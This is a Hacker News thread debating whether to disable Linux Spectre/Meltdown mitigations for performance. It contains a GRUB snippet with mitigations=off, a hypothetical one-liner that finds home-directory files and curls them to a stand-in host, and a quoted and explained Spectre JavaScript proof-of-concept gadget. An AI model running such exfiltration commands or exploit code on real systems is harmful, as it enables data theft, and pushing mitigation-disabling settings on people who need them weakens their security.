TBH it's entirely in character with "make X Y again" to give recommendations that are super straightforward and sound appealing, that don't make a case that X is in fact no longer Y, that completely ignore why those recommendations haven't been implemented thus far, and that don't spend any time asking whether there's even the slightest downside to them (there is: they're super dangerous/harmful).
The most essential person in kernel dev linked this just the other day, presumably seriously, in reply to an AMA question:
75 points · 2 days ago
If my environment doesn't need to worry about executing malicious code and I want syscalls to happen as fast as possible, is there a single/simple option to disable all the performance killing hardware mitigations?
gregkh Verified 183 points · 2 days ago
https://make-linux-fast-again.com/
Sure. That's a very big "if," and the most essential person in kernel dev has the ability to make that the default if he wants. There's a reason he hasn't.
(If your environment actually doesn't need to worry about executing malicious code and you want to make syscalls as fast as possible, try a unikernel or implementing your code in a kernel module. Or, depending on what you're doing, try kernel bypass to get to the devices you care about and use something like https://lwn.net/SubscriberLink/816298/4aed890ee2dbffff/ to pin your user code to certain cores and get the kernel completely out of the way. Having to transition out of user mode to access hardware instead of making plain function calls, having to change page tables between processes, etc. are all performance-killing mitigations of their own. http://www.csl.cornell.edu/~delimitrou/papers/2019.asplos.xc... found a 27x performance improvement by getting rid of the privilege boundary between userspace and kernelspace - if you really care about performance and really don't care about malicious code, why would you leave a 27x speedup on the table and worry about a small percentage improvement from these flags??)
Telling people to write in kernel mode if they care about performance isn't realistic. For most people that would mean completely rewriting their code from scratch, foregoing high-level software stacks and languages, giving up on most databases, giving up on all manner of tools and techniques for high-velocity software development, giving up fault tolerance, dealing directly with fiddly hardware issues (when do I need a TLB shootdown?), etc.
Whereas disabling spectre mitigations is a one-line config change.
For use cases where local system security really doesn't matter (of which there are a lot, let's be honest), a one-line config change for a 25% (or whatever it is now) performance boost is a pretty damned good deal.
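For concreteness, the one-liner on a typical GRUB setup looks something like this (a sketch; mitigations=off is the consolidated switch on recent kernels and distro backports, while the linked site spells out the older per-vulnerability flags):

    # /etc/default/grub
    GRUB_CMDLINE_LINUX_DEFAULT="quiet splash mitigations=off"
    # then regenerate the config and reboot:
    #   sudo update-grub                               # Debian/Ubuntu
    #   sudo grub2-mkconfig -o /boot/grub2/grub.cfg    # Fedora/RHEL-style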
I'm not sure I agree that cases where local system security really doesn't matter and performance matters are that plentiful, but I am happy to be convinced otherwise. In particular, just about any personal computing context doesn't count - you'd have to not run mutually-untrusted third-party code. That rules out web browsers with JavaScript, that rules out Android/iOS-style independent apps, etc. Sure, if you use the web without dynamic content and you use local office suites you're fine, but on the other hand, you don't really care about performance - a 486 will deliver enough performance to read textual content and run a word processor and spreadsheet.
Gaming is a context where you care about performance and you aren't using multiple apps at once, but (and I admit this is a bit of a naive guess) I'd be surprised if it's syscall-bound. It seems like performance is likely to be I/O-bound (getting assets from disk into memory), CPU-bound, and GPU-bound, but are you really making large numbers of syscalls? (Maybe this matters in online gaming?)
So that leaves basically some specific server workloads, and at that point I think some of these techniques start to be realistic. Pinning your work onto a core and using kernel-bypass networking is a pretty straightforward technique these days. It's not quite as easy as using the kernel interfaces, but it's pretty close, and it's definitely worth investing some engineering effort into if you care about performance - you can get much more than 25% speedups.
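The pinning side, as a minimal sketch (the core number and program name are made up): reserve a core from the scheduler on the kernel command line, then pin your hot process to it.

    # kernel cmdline: isolcpus=3 nohz_full=3 rcu_nocbs=3
    taskset -c 3 ./my_hot_loop              # start the process pinned to core 3
    taskset -cp 3 "$(pidof my_hot_loop)"    # or move an already-running pid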
I agree that writing in kernel mode is generally unrealistic (although if you're writing a kernel module for Linux, you still don't need to care about fiddly hardware issues - you've got the rest of Linux still running). Mostly I'd like to see more work like the paper I linked - there should be a standard build of Linux which has hardware privilege separation turned off for use in the cases where you actually can avoid hardware privilege separation (single-user VMs on cloud hosts, single-user data crunching machines, dedicated single-tenant database servers, game consoles without web browsers, ebook readers without web browsers, etc.), or at least a flag to spawn a process and leave it in ring 0. If the use cases are plentiful, this seems like it would be valuable for lots of people - and it'd also make it clear that this generally isn't an option you want on personal computers. (But I think the reason this hasn't been done in the last several decades is that there aren't actually that many use cases that are both genuinely single-user and syscall-bound.)
If you think a 486 is sufficient for reading textual content and running a word processor and spreadsheet, you haven't been paying attention to software bloat. A 486 would have a hard time just booting a modern OS, never mind the application software.
> So that leaves basically some specific server workloads,
The vast majority of servers don't run any untrusted code. Servers tend to do lots of syscalls for network I/O.
> Gaming is a context where you care about performance and you aren't using multiple apps at once, but (and I admit this is a bit of a naive guess) I'd be surprised if it's syscall-bound.
I would expect that interfacing with the GPU involves a fair number of syscalls -- but admittedly I'm also guessing.
> single-user VMs on cloud hosts, single-user data crunching machines, dedicated single-tenant database servers, game consoles without web browsers, ebook readers without web browsers
This is a lot of cases. I'd love to get 25% perf back on postgres, or 25% back on my air-gapped DAW, etc. etc.
Benchmark it - your air-gapped DAW is almost certainly spending very little of its time making system calls, and depending on workload, your Postgres probably isn't either. You'll get 25% back on syscall-heavy workloads but your workloads probably aren't syscall-heavy.
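A quick, rough way to check (pid/program names here are placeholders): attach strace in summary mode to see how much time goes to syscalls, or just time whole runs with the mitigations toggled.

    strace -c -f -p "$(pidof my_daw)"   # Ctrl-C prints a per-syscall time summary
    perf stat -- ./my_workload          # run once with mitigations on, once off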
While we're being honest, how many programs that get written are so desperate for performance that the only thing left to do is turn off security? And are the people who are able to even make this determination the kind of people for whom making a kernel module is unrealistic?
I didn't ignore it. My point is, the kind of people who truly need this kind of performance are already translating hotspots to assembler and so on, a kernel module is plenty practical for them. For nearly all computer users there is no excuse for turning off these mitigations.
I don't know. If I'm running an application server with only my own code on a dedicated server, and I can flip some switches to make it go faster, then that's pretty nice, no? Might save me from upgrading to a bigger (pricier) server. What am I missing?
I mean, sure, that site is nuts, it sorely needs documentation. But not every scenario needs Spectre protection.
The problem with the scenario you describe is: how will you ensure that no one ever forgets that this server is vulnerable and can never be used for certain things? And everyone on here advocating turning off the mitigations is assuming the only exploits are the ones we know about. But when has that ever been the case? If more people turn off the mitigations, black hats will be invested in finding ways to exploit it that we haven't realised before.
Correct, but 'geofft's criticism of it isn't great, in my opinion. Reading it makes it obvious what it does, and only a fool would disable security mitigations in a situation where it mattered. The link has significant value in being a quick and easy way to direct people to information, and it seems nonsensical to criticize it for things which don't particularly apply.
> only a fool would disable security mitigations in a situation where it mattered.
Are we reading the same HN threads on this page? I'm seeing people who I don't consider to be stupid, who obviously have some Linux knowledge, still advocating that user accounts are a waste of time for most desktops.
If anyone is smart enough and knows enough about Spectre/Meltdown to understand the risks they're taking, they are also smart enough to search online how to disable the kernel protections. The commands aren't hard to find.
If anyone is not smart enough to find that information online for themselves, they also don't have enough knowledge to make an informed decision about whether or not it's safe for them to run.
In both cases, there is value in forcing users to display a modicum of knowledge about even just the fact that Spectre/Meltdown exist before we give them a command to run that turns off an important security setting. Anyone who knows anything about Spectre/Meltdown already knows that the mitigations affect performance. They should already know what to search for online without the aid of no-context commands being pasted at the top of HN.
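Case in point: on any recent kernel, seeing what you're vulnerable to and what's currently mitigating it is one command away, no HN thread required.

    grep . /sys/devices/system/cpu/vulnerabilities/*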
> Are we reading the same HN threads on this page? I'm seeing people who I don't consider to be stupid, who obviously have some Linux knowledge, still advocating that user accounts are a waste of time for most desktops.
A fool isn't necessarily stupid: plenty of people have knowledge yet terrible judgement.
> If anyone is smart enough and knows enough about Spectre/Meltdown to understand the risks they're taking, they are also smart enough to search online how to disable the kernel protections. The commands aren't hard to find.
> If anyone is not smart enough to find that information online for themselves, they also don't have enough knowledge to make an informed decision about whether or not it's safe for them to run.
> In both cases, there is value in forcing users to display a modicum of knowledge about even just the fact that Spectre/Meltdown exist before we give them a command to run that turns off an important security setting. Anyone who knows anything about Spectre/Meltdown already knows that the mitigations affect performance. They should already know what to search for online without the aid of no-context commands being pasted at the top of HN.
You're considering it as advice, when really it should be considered more like a DOI.
> A fool isn't necessarily stupid: plenty of people have knowledge yet terrible judgement.
Then I'm not sure why you disagree with my criticism - I'm claiming that this page appeals to people who have knowledge in this matter but have not done the deep thinking to have wisdom in this matter. There are plenty of smart people who find "Make X Y again" for other values of X and Y appealing.
I'm claiming it functions more like a DOI or other identifier than a sales pitch. I don't think there's a ton of deep thinking involved: there will always be someone who's willing to run a web browser as root on their main system; you can't stop people who are set on something foolish from doing it, but if you can make it more convenient for people who have valid reasons, why not?
This all might be a bit too much serious thought for what was intended as a joke initially (the site, not my comments), though.
Android differentiates between user processes and root processes. I'm pretty sure iOS does as well, although maybe they've coded it as something weird.
I'm not seeing people here arguing that Linux could get by with only supporting 1 user account. I'm seeing people argue that the biggest reason they avoid running as root is just because userland applications complain about it. It's very difficult to do sandboxing if there isn't some kind of differentiation between a privileged and unprivileged process.
Regardless, Linux also doesn't really have good sandboxing by default, so I'm not completely sure what you're getting at. It's still a bad idea for people to run a Linux system as root.
> Reading it makes it obvious what it does, and only a fool would disable security mitigations in a situation where it mattered.
I disagree. Most users do not understand how speculative side channels work or how they might be affected; many people's experience with Meltdown and Spectre is "my games got slower because of some magical speculative stuff that I don't really understand". Making an informed decision on this is hard.
The average Linux user will not understand the implications. Heck most don't even know the security trade-offs of X11 (which are relatively simple to discover and understand).
Leave the HN bubble and go to an average Linux forum. You would be surprised what kind of advice people give or what people are willing to copy and paste into their terminal ;).
This is not meant as a criticism. Most people, including many Linux users, just use their computer as a tool and will just do anything to get it running as they want.
Most offline systems, and many systems used only for running trusted code (which obviously bars anything with a web browser, and most internet-connected personal computing devices, among other things). Workloads in the vein of "scientific number-crunching", for example, generally run on systems where security doesn't matter much.
There's a case to be made for gaming, and the mitigations, if I remember correctly, definitely ding performance in quite a few games, but because most computers used for games have significant amounts of sensitive information on them, among other things, I don't think it really holds up well.
Benchmarks (I really dislike linking to this site, but given it did a bunch of benchmarks, it's not the worst thing, I guess):
'Up to 50% performance loss!' is obviously clickbait, and I disagree with a lot of the wording & conclusions & so on, but there's definitely some workloads where the trade-off makes sense.
Warning about those benchmarks, though: they're from a rather old kernel version; I imagine the mitigations tank performance less now. However, given that 5.x has, to my knowledge, been performing considerably worse than 4.x, 4.x is probably what most people would be using for these sorts of things.
Are systems used for "scientific number-crunching" really applicable in this case? While some departments may have those on a separate network, not connected to the internet at large, I have never heard of a system employed for research tasks being completely air gapped. Otherwise, accessing and working on data would be prohibitively harder. Would such a trade-off be worth the potential gains by deactivating mitigations?
Also, may I ask why you dislike Phoronix? I personally enjoy their articles, and the benchmark suite they have developed seems very well-rounded and transparent. I wouldn't count the statement concerning the ~50% increase in time it takes to complete a certain task on 4.20 as clickbait, considering it was never used in the linked article's title to hook readers and gain clicks.
Honestly, I have yet to see a use case large and popular enough that both allows for a completely air-gapped system and benefits from disabling mitigations heavily enough that an admin couldn't just look up the flags required. If I, as an admin, made the conscious choice to go so far as to disable these patches, I would also want to at least re-read whether this is truly significantly advantageous, rather than copying a line from a website with no context or further information on the current state and impact on performance.
It'd be nice to be able to easily boot into, or toggle into, a performance-optimized, mitigations-disabled environment to do something while offline... many computer uses don't require being connected to other computers. I've gotten into the habit of hot-plugging my Ethernet connection, personally.
You can actually do that fairly easily: just add the linked parameters to a second boot entry in GRUB.
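A sketch of what that second entry could look like (every path and UUID here is a placeholder; copy the real ones from an existing entry in your generated grub.cfg). Append it to /etc/grub.d/40_custom and regenerate the config:

    menuentry 'Linux (mitigations off)' {
        search --no-floppy --fs-uuid --set=root YOUR-BOOT-FS-UUID
        linux  /vmlinuz root=UUID=YOUR-ROOT-UUID ro mitigations=off
        initrd /initrd.img
    }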
However, I would very much not advise doing so, as I'm still unaware of any task that can both be done without a network connection and is significantly slowed down by the mitigations, after recent improvements to the kernel and software. Basically, the potential benefit is very low for a lot of tasks, while requiring additional security measures (ideally a fully air-gapped machine) and a reboot every time you do such a task.
Also note that, in theory, just being temporarily offline may not shield from being exploited fully.
As an example (the only case I've identified personally), if you're curious: I have a (Windows; Intel Q6600) box that I use for gaming occasionally. A single-player game I like, Total War: Shogun 2, ran at about 55 fps (benchmark) pre-Meltdown/Spectre/etc. Now it gets ~22 fps. I can use https://www.grc.com/inspectre.htm to toggle some mitigations to get it playable again.
Is there a possibility this whole project is in jest? It's called "Make Linux Fast Again", and it deliberately disables reasonable security measures to achieve its goal. Could be a political statement in the negative!
The quality of comments on Hacker News is due to the high bar for thoughtfulness and respect, not to a restriction blocking any "political" discussion.
The linked content (disable security features to improve performance) is very clearly a relevant topic for hacker news and the apparent association between the linked domain and Trump's infamous catch-phrase seems like an intentional choice that is worth discussing.
I think it is a real problem that someone should try to solve. I visit a good number of expert communities and they all tend to be highly on topic. This is a good thing without question but I've often noticed the community is completely oblivious to what happens outside their bubble. I suspect most of the accidental battles are from being years behind on the discussion with the people they've talked with every day for the last decade or so.
I don't claim to have a solution. Programming philosophy or Programming politics do not seem very attractive but I do suspect there to be a big adventure behind those curtains. It's not like code is not political, lacks a philosophy or ideology. But the best we could do was "stop spying on me!"? hah
Yes, that's the point of this site - if your workflow is hurt by the perf impact of the mitigations and SPECTRE & friends are not a credible attack, for instance because you disable JS by default, then you can just curl this and paste it into your kernel parameters.
To be clear, SPECTRE leaks privileged memory at the OS level -- in some cases up to allowing arbitrary virtual memory reads.
While Javascript is the most likely attack vector for most people, you should not use this command on a system that's running untrusted code from anywhere in any context, and you should consider moving sensitive information like passwords off of the computer.
I use uMatrix to disable Javascript by default on every site I visit, and I still would not feel safe running this command on anything other than a single-purpose device.
That's not to say that there would never be a good reason to run it. A very imprecise, easy test I would propose is, "is your Linux system vetted enough or just unimportant enough that you would feel comfortable getting rid of users and running all of your software as root?" In which case, SPECTRE & friends is probably not a credible threat to you on that machine.
Only if you are using multiple accounts and you are concerned about privilege escalation. But let's be honest: most people use only one user account, with sudo rights, and probably without a sudo password, because entering it 1000 times a day is a pain.
Thus every program can access everything without doing anything special: it just needs to spawn a process to read stuff around the FS or, assuming you have passwordless sudo, gain root access and read /dev/mem. That is simpler than doing a SPECTRE attack.
So who needs these mitigations? Those who run containers or sandboxes where untrusted code is meant to be isolated. Browsers are an example, but they have specific mitigations anyway, and mounting an attack from JS is not that simple really. So I'm not so worried about SPECTRE for typical desktop usage.
Of course if we talk about servers they are very important.
> But let's be honest: most people use only one user account, with sudo rights, and probably without a sudo password, because entering it 1000 times a day is a pain.
The solution is to teach those users how to use sudo properly, not to teach them to be even more insecure than they already are.
It's like saying, "I don't need to wear a seatbelt because I already drive my car at 90mph everywhere, so the seatbelt wouldn't make a difference in a crash anyway."
If you have sudo set up without a password, fix that crud! This is not a new concept, the Linux community has been warning people about unprotected root access for over a decade.
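Checking takes a minute (paths vary a bit by distro):

    sudo grep -rn NOPASSWD /etc/sudoers /etc/sudoers.d/   # find passwordless rules
    sudo visudo                                           # edit safely, drop the NOPASSWD: tags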
The concept is crud, for a personal computing device at least. Why should I bother moving along lines which have nothing in common AT ALL with personal use, and were instead historically shaped by the needs of accountability and billing?
> you should not use this command on a system that's running untrusted code from anywhere in any context
I don't really understand this point.
Any program you download from the internet, say, VLC or Kodi or a game emulator or whatever, can already do `find $HOME | curl -F 'files=@-' https://my.totally-legitimate.website` and read the memory of all the processes of your user with a script that'd involve `ps -u` and `/proc/<pid>/maps` (plus `/proc/<pid>/mem`), mitigations or not, unless you use something like QubesOS (but most people do not).
Leaking bits with spectre would be a super long process versus... just doing that if you could already get the user to download your code.
> Any program you download from the internet, say, VLC or Kodi or a game emulator or whatever, can already do `find $HOME | curl -F 'files=@-' https://my.totally-legitimate.website` and read the memory of all the processes of your user
There are variants of Spectre and Meltdown that expose kernel memory. If you're really in a position where you don't think that makes a difference, then why are you messing around with user accounts in the first place? Why aren't you running all your software as root?
I'm not going to argue Linux sandboxing is awesome -- it's very clearly not. But user permissions are a big part of what security we do have. Spectre/Meltdown also limit the effectiveness of the newer sandboxing features we're getting from packaging systems like Flatpak. Maybe you're not running any of that stuff on your system, but...
I'm seeing a lot of people here being kind of blasé about the potential risks, arguing that they only need to protect themselves from websites, and I am skeptical that all of those people actually understand the full extent of these vulnerabilities.
On a single owner desktop system, isn't kernel memory strictly less interesting than user memory, for reads? All of the important things, like passwords and emails and secret keys, are in user space memory or in the user readable file system, generally...
> Why aren't you running all your software as root?
A lot of software gets snippy when you try to run them as root. That said, the biggest advantage of non-root is protecting myself from fucking up my own system.
If somebody gets access to my user account, they can't change my system files, but they can literally buy an entire new PC with my money, on which they can then presumably change whatever system files they want. I hope that example outlines how pointless root protection is in a modern consumer PC.
> they can't change my system files, but they can literally buy an entire new PC with my money
This is a problem that's fixable with additional security additions, but only if you haven't granted everyone root access.
You can set up ssh with appropriate privileges and chown private keys to root so that accessing them requires a (sudo) password. You can run certain programs like games as unprivileged users without full access to your $HOME directory. You can start using Flatpak and Wayland. Unless you have a Spectre/Meltdown vulnerability, in which case most of that is pointless.
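The separate-user trick, as a sketch (user and program names are made up):

    sudo useradd -m gamesandbox                 # throwaway account with its own $HOME
    sudo -u gamesandbox -i /usr/bin/somegame    # the game never sees your real files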
I don't understand the mentality that says, "my system is broadly insecure, so I'd better make it impossible to secure." I mention this elsewhere[0], but a big part of getting to a secure Linux system is patching the holes we can right now.
> There are variants of Spectre and Meltdown that expose kernel memory. If you're really in a position where you don't think that makes a difference, then why are you messing around with user accounts in the first place? Why aren't you running all your software as root?
Only somewhat devil's advocate: Software running as root can accidentally delete important files. I run software as non-root to prevent myself from my silly mistakes. You don't accidentally leak information through SPECTRE.
> There are variants of Spectre and Meltdown that expose kernel memory. If you're really in a position where you don't think that makes a difference, then why are you messing around with user accounts in the first place? Why aren't you running all your software as root?
I'll be honest, because that's the default on Linux (I'd make the effort to do that for my personal things at least - I'd never do that on computers with shared accounts or with work-related data).
It's not that the vulnerability isn't dangerous. It's that there are already _so_ many other vulnerabilities that outside of maybe JavaScript it doesn't make a whole lot of difference. Desktop Linux security is basically this: https://i.redd.it/bqk0cv1r56c41.png Why worry about a hole in the fence gate when anyone can just walk around it?
The problem is that there are like 4 or 5 efforts going on in Linux right now to make things more secure. But they're all kind of targeted, and we need all of them to coordinate with each other, so individually each of them gets dismissed because "what's the point of plugging one hole?"
People mention $HOME access. This is something that we're trying to solve with Flatpak: filesystem access should be sandboxed by default. But that requires coordination with desktop environments like Gnome; otherwise everyone just grants programs anything they want because the UX is bad.
And then on top of that we have X11, which is its own mess, and we're trying to address that with Wayland. But Wayland isn't perfect yet for desktop recording, and there's not a ton of effort from software like Emacs to get off of X and onto Wayland because of "what's the point?" arguments. So Flatpak becomes a lot less valuable because X11 keylogging is so easy.
Then we have just flat-out bad user security, where people are setting up sudo without a password. So process isolation becomes a lot less valuable because programs can just manipulate the raw filesystem.
And then we have Spectre/Meltdown leaking passwords, but who cares, because "people don't set passwords anyway"?
And whenever a group of people get together and propose any fixes in isolation, there is inevitably someone in the Linux community who will stand up and say, "Look, Wayland is pointless because someone wrote a keylogger[0]. Why are we spending any time fixing this stuff?"
Imagine you are on a boat with 10 holes in the bottom, all of them leaking water. If you want to fix that problem, there is inevitably going to be a period where 5 of the holes are patched and 5 of them aren't. And if you get to that point and start re-opening the holes that did get patched, it's going to be very hard to make any more progress.
It's not that the desktop Linux developers don't care about security; there's simply not enough manpower behind it. The Linux kernel is only secure because that's what the cloud companies with a shit ton of money care about. They don't care about desktop.
I don't think reality is quite like your little image here. There is no absolute security, ever, but we can create layers of difficulty for attackers as appropriate for our threat models. Someone with a reasonable amount of expertise and caution can use Linux on a personal computer in ways that make it very nearly impossible for a typical "criminal level" hacker (as opposed to nation-state level hacker) to steal information from them. Yes, that means not downloading arbitrary executables from the net, among other things, and certainly not running arbitrary code from the net like Javascript. When you do need to run something untrusted, run it isolated in a VM, etc. If you do these kinds of things, then it makes sense to also use stuff like Spectre mitigations.
That's not necessarily true; several security layers have been added these past few years. The Yama LSM prevents user processes from reading the memory of processes that are not their children. It's already enabled by default in Ubuntu (but not Fedora, which decided to keep it disabled by default so that user gdb still works).
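Concretely (0 is classic ptrace, 1 restricts memory reads to descendant processes):

    cat /proc/sys/kernel/yama/ptrace_scope    # current setting
    sudo sysctl kernel.yama.ptrace_scope=1    # restrict to child processes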
There are definitely still holes in the Linux security model, especially regarding file access (any user process having access to all the user's files is far too broad), but that doesn't mean we should just leave known vulnerabilities open, especially since an attacker may not have all methods of attack available.
I would appreciate someone else who knows more than me about the current state of these attacks and more than me about Linux security in general answering this question. Take what I'm about to say with a grain of salt.
My understanding is that Firefox still reduces timer accuracy, Chrome did, but increased timer accuracy again after adding other protections. I'm not sure if Chrome's protections rely on Meltdown vulnerabilities being patched on the OS level or not. It's been a while since I checked back on what the status was there, so I might be wrong.
There are also some concerns about shared memory buffers, which is why I think some of the features around them haven't been enabled in WASM yet. I haven't checked the status on that stuff in a while either.
In any case, for a vulnerability of this scale I bias towards saying people should practice defense in depth. Sometimes browsers have bugs in them, and this would be a particularly bad one. And again, there are userland native apps and systems and package managers that people need to worry about that go beyond browsers.
Yes, but this doesn’t actually fix the issue; it just makes exploiting it harder. Fundamentally, even if you fudge clocks you can still average out things with enough measurements, and if you remove all of them you can busyloop and count iterations of that instead as a “timer”.
They had to disable shared memory APIs for threading in JavaScript, because those could be used to implement accurate enough "clocks". That was a temporary measure and last I checked some browsers enabled them again once the memory access itself was patched. So by removing the memory access patch you are once again fully vulnerable.
This just makes the attack harder, I was told. There are arguably plenty of ways to measure time within javascript even without a clock; you cannot disable that.
Reducing timer resolution was done early on as a quick reaction by browser developers when Spectre & Meltdown were first publicized.
All an attacker needs to do is distinguish between a cached and non-cached memory read - i.e., was accessing some variable "faster" or "slower". There are lots and lots of ways to measure this. A good whitepaper is "Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural Attacks in JavaScript".
The TLDR is that timer resolution reduction is ineffective as a speculative attack mitigation.
I thought your tone was fine, but the phrase "Yes, that's the point..." can sometimes (not always) be associated with a condescending, sometimes even impatient, tone. It's not intrinsic to the phrase, it depends on what the reader may associate with the phrase. (I'm also not saying this actually happened in this case, I'm just speaking generally.)
Agreed, and the part that may be difficult for a non-native speaker to get is what other words would give the same meaning but seem less confrontational: e.g. "Yes, that's the intent..." conveys the same meaning but with a milder tone. I think with "point" there's the suggestion of "You missed the point," which is an insult.
I think you're fine! But just to try and deconstruct... similar phrasing:
> Yes... that's the entire point of xyz -_-;
...is semi-frequently used to imply "what you said is obvious" with a sort of... dismissive undertone, which might've been what miles was reacting to. Breaking the phrase up a bit more and making it a bit more casual/chipper somehow feels harder to misinterpret this way? Even without resorting to emoji as I have here:
> Yep! That's the point of xyz :)
But I could see myself using your phrasing as a native speaker, so I wouldn't worry about it too much ¯\_(ツ)_/¯
> SPECTRE & friends are not a credible attack, for instance because you disable JS by default
That's... an extremely optimistic perspective on what's running on your system. Disabling JS in browser tab contexts (even if it's universal and not just "by default") is going to cover a pretty small percentage of SPECTRE et al. vectors.
Personal use usually involves a web browser, which usually executes untrusted javascript from the web. You won't find me disabling these mitigations on any of my workstations any time soon.
Yes, the original Javascript exploit from the paper still works, because the browser cannot mitigate this attack without just disabling parts of Javascript entirely, which breaks Javascript.
With all current kernels built to mitigate these exploits, and all sane people running those kernels, there's no benefit in patching the browsers too, even if it were somehow possible, which for all intents and purposes it is not.
Well, the link you provided doesn't use SharedArrayBuffer; it is used as part of the exploit if you read the original paper (as a method to make a high-resolution timer).
You won't find a real world exploit that does something like reading a password, SSH key, etc. It would be like winning the lottery, then getting your money out 1 penny at a time for the next several decades. You can find "academic" PoC exploits that work under pristine conditions.
I'm not super familiar with Spectre, but I think the linked page is misinterpreting the vuln (hopefully someone will correct me if I'm totally out to lunch).
So the original js from the spectre paper was:
if (index < simpleByteArray.length) {
  index = simpleByteArray[index | 0];                  // speculative out-of-bounds read
  index = (((index * 4096)|0) & (32*1024*1024-1))|0;   // spread the value across cache lines
  localJunk ^= probeTable[index|0]|0;                  // touch probeTable, leaving a cache trace
}
The code looks a bit weird (all the |0s) to ensure Chrome JITs it the correct way. My understanding of what happens: the loop goes a bunch of times while index is inside the simple byte array. After the last iteration, the processor speculatively executes the loop one more time than it should (branch misprediction). It eventually figures out the loop should end and undoes the speculative execution. However, that only happens after the loop has already started executing (where it's not supposed to). During this improper execution, index is past the end of simpleByteArray. index = simpleByteArray[index | 0] is then executed. index is now set to the value of some memory in the current process that the current JS is not supposed to access.
index = (((index * 4096)|0) & (32*1024*1024-1))|0; is executed to spread the memory value out (we need all possible values to land in separate cache lines in probeTable later). We now execute localJunk ^= probeTable[index|0]|0;. localJunk is just there to prevent the dead-code-elimination optimization. Since we are now indexing into probeTable at 4096-byte intervals, we have to fetch that value from memory. It then gets cached by the processor. This all gets undone by the processor when it realizes that the branch was incorrect, except the cache changes are not undone. If we access anything else in the same 4096 bytes later on, the access is a tiny bit quicker.
The exploit is that, after all that setup, we try accessing each 4096-byte region of probeTable to see which one is fastest. We can then conclude that was the value of index during the branch misprediction, and thus the value of that byte of memory we aren't supposed to see.
If we do this a lot, we can read the rest of the process's memory. The hope is we will be able to find cookies related to other websites currently open, and then do evil things with them.
This attack no longer works because browsers disabled SharedArrayBuffer, which provided the really precise timer. The timing difference is very small, so you need a very fine-grained timer to make it work. It should also be noted that this variant of Spectre is in-process only. Some versions of Meltdown/Spectre allow accessing memory of other processes, but as far as I understand this version is in-process only.
I hope that made sense, and I hope I didn't screw that up.
Eh. The amount of performance you sacrifice in order to mitigate the very small chance of actually running across any javascript in the wild that a) successfully exploits you, and b) actually retrieves anything worthwhile, just isn't worth it. It's such a tiny risk that it's really only worth mitigating against if you're paranoid or handling particularly sensitive information.
Again, JS can no longer perform this exploit. Browser vendors have disabled (made inoperable) high resolution timing. It's now at 1ms resolution. Not enough timing resolution to mount the attack.
postMessage cannot provide a reliable timing signal since it goes on the task queue on the receiving end (in the main thread) along with other pending events, and even if there were no other events, there is latency noise in postMessage due to the fact that the web worker is not the only thread running on the CPU. Some suggest that the attack would only take more time as the attacker has to collect a bigger sample, and factor out the noise, but I haven't seen a public exploit based on that.
The minimum essential behavior to implement a feature is one that takes into consideration keeping the user safe from attacks... you could call that bloat, but I wouldn't be sarcastic about it: if you can make the mitigations more concise, you can contribute your ideas; no one is stopping you.
Shared Array Buffers are enabled by default in Chrome now, because Chrome has separate mitigations against Spectre.
To the best of my knowledge, it does not have mitigations against Meltdown because it assumes those protections will be implemented at the OS/firmware level, but if anyone has more experience or insight than me on that front, they're welcome to correct me.
In any case, you're making a kind of wild assumption that the type of user who disables a security feature in their OS to get a speed increase won't also likely disable security features like Site Isolation in their browser when they hear that those features increase Chrome's memory usage by somewhere between 10% and 20%.
So there's a known exploit in CPUs and your response is "prove to me it can be exploited or I won't use mitigations"? In 2020 no less? What can you possibly be doing that would even notice the slowdown from these mitigations? Virtually everything we actually do will be bottlenecked by something else long before the CPU becomes an issue.
In my mind, javascript is so many layers removed from machine code that it would be insanely hard to even break out of the Chrome sandbox, let alone glean anything useful from other running processes.
"We were not able use these techniques in Firefox, as they recently reduced the timer resolution to 2ms. The techinque presented here is potentially relevant even for this timer resolution, but some parameter tweaking is required.?"
AFAIK, Chrome's highest resolution is also in the ms range.
I have some thoughts, too, but thoughts don't amount to a working exploit. Show me a currently working exploit, that is in the open. As far as state actors developing such exploits, there are a ton of holes in that scenario at every layer in the stack.
HN wouldn't let me nest another response. This is in regards to "Timers aren't necessarily even a requirement"
<<you can busyloop and count iterations of that instead as a “timer”>>
Assuming you're the only job running on the CPU, which is not the case. Threads are not running continuously. But again, if there is a working exploit in the browser then show us. Talk is cheap.
I am aware that threads don't run continuously; scheduling just makes this worse just like timer jittering does. Sadly, I'm not the kind of person who can drop full, working exploits against unpatched browsers in response to Hacker News comments; I just have a passing interest in the field :(
performance.now resolution in Chrome is between 1 and 2 ms, I believe, with jitter. If they have a working PoC for Chrome, why not demonstrate the full exploit and force the Chromium team to rethink their mitigations? Lots of people talking possibilities, but zero working exploits in the open. That's not good ground for rational debate.
Timers aren't necessarily even a requirement to exploit Spectre: https://news.ycombinator.com/item?id=22831067. It's pretty hard to protect against this in general unless you generate retpolines.
I mean, it's pretty obvious that enabling an option named nospectre_v1 (and v2) is going to disable the Spectre mitigations. I feel like nobody should act shocked by this.
https://gist.github.com/rizalp/ff74fd9ededb076e6102fc0b636bd...
https://securitronlinux.com/bejiitaswrath/how-to-get-a-nice-...
https://www.phoronix.com/scan.php?page=news_item&px=Spectre-...